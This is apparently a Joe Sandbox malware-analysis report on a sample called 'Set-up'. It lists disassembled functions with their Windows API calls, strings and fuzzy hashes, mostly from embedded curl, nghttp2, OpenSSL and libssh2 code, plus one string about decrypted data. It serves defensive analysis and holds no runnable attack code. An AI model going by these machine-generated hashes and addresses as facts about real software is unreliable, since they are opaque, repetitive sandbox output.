Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen
String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
API String ID: 39653677-4104037097
Opcode ID: ef8b3516f1c73aca5fe3a7186690c59d489ef6007659f032a7359096390b4c86
Instruction ID: 6bed115344ea4e0a51aa8ead6993e57ecf7f54930e41e6106fbd0449dd3191ff
Opcode Fuzzy Hash: ef8b3516f1c73aca5fe3a7186690c59d489ef6007659f032a7359096390b4c86
Instruction Fuzzy Hash: E0A132706043806BEB24AE16CC45B7A7BDAEF85318F1C447CF9898B292E7719C41C7B2

Function 00DFA260 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 160networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32(?,?,00000080), ref: 00DFA376
WSAGetLastError.WS2_32 ref: 00DFA380

Part of subcall function 00DC78B0: closesocket.WS2_32(?), ref: 00DC78BB

Part of subcall function 00DFEF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 00DFEF6F

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DFA3D2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DFA3D6

Strings

accepted_set(sock=%d, remote=%s port=%d), xrefs: 00DFA488
ssrem inet_ntop() failed with errno %d: %s, xrefs: 00DFA3F4
getpeername() failed with errno %d: %s, xrefs: 00DFA3A0
cf-socket.c, xrefs: 00DFA2E9

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _errno$ErrorLastclosesocketgetpeername
String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 1501154218-2965463112
Opcode ID: b8363aa55fcf6596f6fd2b4c133d7a3f477e20b7ba590311dcc21191f6bbd902
Instruction ID: aab704e82a68c65889a25e42d067baf1b608a98659f81099b192cf5e63194ae0
Opcode Fuzzy Hash: b8363aa55fcf6596f6fd2b4c133d7a3f477e20b7ba590311dcc21191f6bbd902
Instruction Fuzzy Hash: 3B512B71904344ABDB219F28DC45BFA77B4EF81314F088519F95C5B252EB32A989CBB2

Function 00E6A5A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 00E6A5FC
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 00E6A698
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00E6A6BF
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 00E6A6EB
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 00E6A700

Strings

nghttp3_ksl.c, xrefs: 00E6A6E1, 00E6A6F6
i + 1 < blk->n, xrefs: 00E6A6E6
lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK, xrefs: 00E6A6FB

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assertmemcpy$memmove
String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
API String ID: 3463011695-2629231663
Opcode ID: 2ae37d1d6617e1b0fc31158e646491ae0fe68e15c9a4803cb3df1c3d48e01a95
Instruction ID: 6a41f06a253b3ecd40d30c8251383fdb68f7ac2bbb189cce1bffab10d8177e5f
Opcode Fuzzy Hash: 2ae37d1d6617e1b0fc31158e646491ae0fe68e15c9a4803cb3df1c3d48e01a95
Instruction Fuzzy Hash: 89418F75A443049FC708EF18D88186AB7E6FB98708F08996DE889AB301E670EC11CB91

Function 01002480 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 01002491
CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 010024C6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00FFF5B4), ref: 01002529

Strings

%lX, xrefs: 01002534
Error code= 0x, xrefs: 01002545
engines/e_capi.c, xrefs: 010024A6, 0100251C, 01002559
engines/e_capi_err.c, xrefs: 010024F6
ERR_CAPI_error, xrefs: 010024EF

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: CertCertificateContextProperty$ErrorLast
String ID: %lX$ERR_CAPI_error$Error code= 0x$engines/e_capi.c$engines/e_capi_err.c
API String ID: 2217977984-837018288
Opcode ID: f12e5f6331c936e5e7b4a0d21b5cb78b2bed24c6ec7960858a5f7aa024c6fb6e
Instruction ID: d683631dfbc83dbb240041b955ca9475dba3dea6ee68d889c7ed898de660ea02
Opcode Fuzzy Hash: f12e5f6331c936e5e7b4a0d21b5cb78b2bed24c6ec7960858a5f7aa024c6fb6e
Instruction Fuzzy Hash: F711EB71B8030477F6203275BC4BF2B3A5CDB84B49F11802AFA4D792D7E5BA85209A73

Function 00E4A340 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((!session->server && session->pending_no_rfc7540_priorities != 1) || (session->server && !session_no_rfc7540_pri_no_fallback(session)),nghttp2_session.c,0000034E), ref: 00E4A377
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri_spec->stream_id != stream->stream_id,nghttp2_session.c,0000034F), ref: 00E4A507
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(dep_stream,nghttp2_session.c,00000377), ref: 00E4A51C

Strings

dep_stream, xrefs: 00E4A517
nghttp2_session.c, xrefs: 00E4A36D, 00E4A4FD, 00E4A512
(!session->server && session->pending_no_rfc7540_priorities != 1) || (session->server && !session_no_rfc7540_pri_no_fallback(session)), xrefs: 00E4A372
pri_spec->stream_id != stream->stream_id, xrefs: 00E4A502

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (!session->server && session->pending_no_rfc7540_priorities != 1) || (session->server && !session_no_rfc7540_pri_no_fallback(session))$dep_stream$nghttp2_session.c$pri_spec->stream_id != stream->stream_id
API String ID: 1222420520-1552295562
Opcode ID: 6430c73df7436f8100da6e29f22bb766f5ffd6d962546316a824195a03f1f539
Instruction ID: 8e51f830bc88311b7a052afb430b41c2ead8740feb90aedbff43c44da5c5223e
Opcode Fuzzy Hash: 6430c73df7436f8100da6e29f22bb766f5ffd6d962546316a824195a03f1f539
Instruction Fuzzy Hash: ADA149719843855FDB319A30A845BAE7BE46F4132CF0C183DEC89A7242E775E954CB53

Function 00E12430 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E12666
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E12699
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E126FB
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 00E1273A

Strings

Shuffling %i addresses, xrefs: 00E124A6
hostip.c, xrefs: 00E124B4, 00E1253F, 00E12613, 00E12626, 00E12673, 00E1276D, 00E127AF
:%u, xrefs: 00E126CC

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: :%u$Shuffling %i addresses$hostip.c
API String ID: 2198566249-1766712111
Opcode ID: 9338c40d08b6d149093ce2c00201a903a9116218eb1c4c0529b4217d36a667fe
Instruction ID: e8b7549dd053b445877eb6586423fb2e4c8d59a6a353b108a4791f2f1fa1c40b
Opcode Fuzzy Hash: 9338c40d08b6d149093ce2c00201a903a9116218eb1c4c0529b4217d36a667fe
Instruction Fuzzy Hash: F4A1D3756043019BD734DF18DC85BE7B3E5EF84318F18842DEE8A97382E735E9A18A91

Function 00DC230E Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 133stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DC2359
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DC2465
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DC24AB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DC23EE

Part of subcall function 00DC1A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC1A70

Strings

, xrefs: 00DC234F
, xrefs: 00DC234B
, xrefs: 00DC2367
Memory allocation failed for decrypted data., xrefs: 00DC2411

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: free$abortmallocstrlen
String ID: $ $ $Memory allocation failed for decrypted data.
API String ID: 673139954-1317699236
Opcode ID: 581d1fba4b1cfafeafc7e61aa29d80ef20fb957a8808356f768a698cc30e70ad
Instruction ID: 8b707a748c91878195339c80aa974a5498ad5a2a19f6b96fa86e3b80eaf54bfa
Opcode Fuzzy Hash: 581d1fba4b1cfafeafc7e61aa29d80ef20fb957a8808356f768a698cc30e70ad
Instruction Fuzzy Hash: A25192B4904709DFCB04EFA9C48599EBBF0FF88310F108919E89897325E774D9459F62

Function 00FDE110 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00FDE16C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00FDE17B

Strings

for, xrefs: 00FDE154
, xrefs: 00FDE14D
Ente, xrefs: 00FDE145
:, xrefs: 00FDE15C
crypto/ui/ui_lib.c, xrefs: 00FDE195
er , xrefs: 00FDE13D

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen
String ID: $ for$:$Ente$crypto/ui/ui_lib.c$er
API String ID: 39653677-1187194756
Opcode ID: a351dc5ee35f73b9d44bea2bdc8eea479a507e2137e5d797afed22b0945b6e3a
Instruction ID: 67e44e5d716e3373531517f57f267960c44cb15bfac0624dec61a381d810ea13
Opcode Fuzzy Hash: a351dc5ee35f73b9d44bea2bdc8eea479a507e2137e5d797afed22b0945b6e3a
Instruction Fuzzy Hash: D72188F3E04210BBE610BA565C41D6B77AD9F91764F0D443AFD4C86302F636C914E6A2

Function 00DD6330 Relevance: 12.1, APIs: 8, Instructions: 77sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDD8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00DD01B1), ref: 00DDD8E2

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00E0420E,?,?), ref: 00DD6350
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00E0420E,?,?,?,?,?,?,?,?,?,00E0420E,?,?), ref: 00DD635B
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00DD6369
Sleep.KERNEL32(00000001), ref: 00DD63B2
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00DD63BC
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00E0420E,?,?), ref: 00DD63C7
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00E0420E,?,?), ref: 00DD63D6

Part of subcall function 00DDD8C0: GetTickCount.KERNEL32 ref: 00DDD968

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00DD63ED

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
String ID:
API String ID: 1793959362-0
Opcode ID: b99cb61afa58bfe8a2255bb3e5e83ae12b37951d72c2520ee67a4689ddadbf8a
Instruction ID: 3e7105a4a0a971f603935a8f69b400ebaef45ef5663420500cc16f31dd71b544
Opcode Fuzzy Hash: b99cb61afa58bfe8a2255bb3e5e83ae12b37951d72c2520ee67a4689ddadbf8a
Instruction Fuzzy Hash: 28112BA2D0064057EB117A746C41B7F7368DFA5728F0D0226FD4852302F722DA5583F3

Function 00E18200 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 340stringCOMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A,?), ref: 00E18290
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E18313

Strings

Received HTTP/0.9 when not allowed, xrefs: 00E18513, 00E18640
HTTP/, xrefs: 00E18354, 00E1859F
Invalid status line, xrefs: 00E184F1, 00E18625, 00E18645
RTSP/, xrefs: 00E1837A, 00E185EC

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memchrstrlen
String ID: HTTP/$Invalid status line$RTSP/$Received HTTP/0.9 when not allowed
API String ID: 1715104208-1496966621
Opcode ID: 72b9352683eddf5a23f636a2e05a50c6591e83eb862ac6fe1d347ea3083f1b27
Instruction ID: 76ccbb2058950951a8e9cd2f29b4e1db673def9c872730028ad148c9e7893351
Opcode Fuzzy Hash: 72b9352683eddf5a23f636a2e05a50c6591e83eb862ac6fe1d347ea3083f1b27
Instruction Fuzzy Hash: F8B109B1A047416BD720AA249D81BEB76D8DF51308F04643DFDA9A7242EF35ED84C7A2

Function 00EAE1F0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00EAE209

Part of subcall function 00EA4620: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000004,?,?,00000000,?,00EB1478,?,?,?), ref: 00EA4643

Strings

Unable to send FXP_REMOVE command, xrefs: 00EAE36B
SFTP Protocol Error, xrefs: 00EAE3AA
Error waiting for FXP STATUS, xrefs: 00EAE3BD
Unable to allocate memory for FXP_REMOVE packet, xrefs: 00EAE374
SFTP unlink packet too short, xrefs: 00EAE35A

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _time64memcpy
String ID: Error waiting for FXP STATUS$SFTP Protocol Error$SFTP unlink packet too short$Unable to allocate memory for FXP_REMOVE packet$Unable to send FXP_REMOVE command
API String ID: 1622878224-2749593575
Opcode ID: c8165b5364eafa5466f7f3cfec5caf63cd4ca5c3c0713600e2f16d14c16ff28a
Instruction ID: 1036eb3b1815390b4cd853cfd9312191fbee7ddd1b93c4f03135100cb928f40e
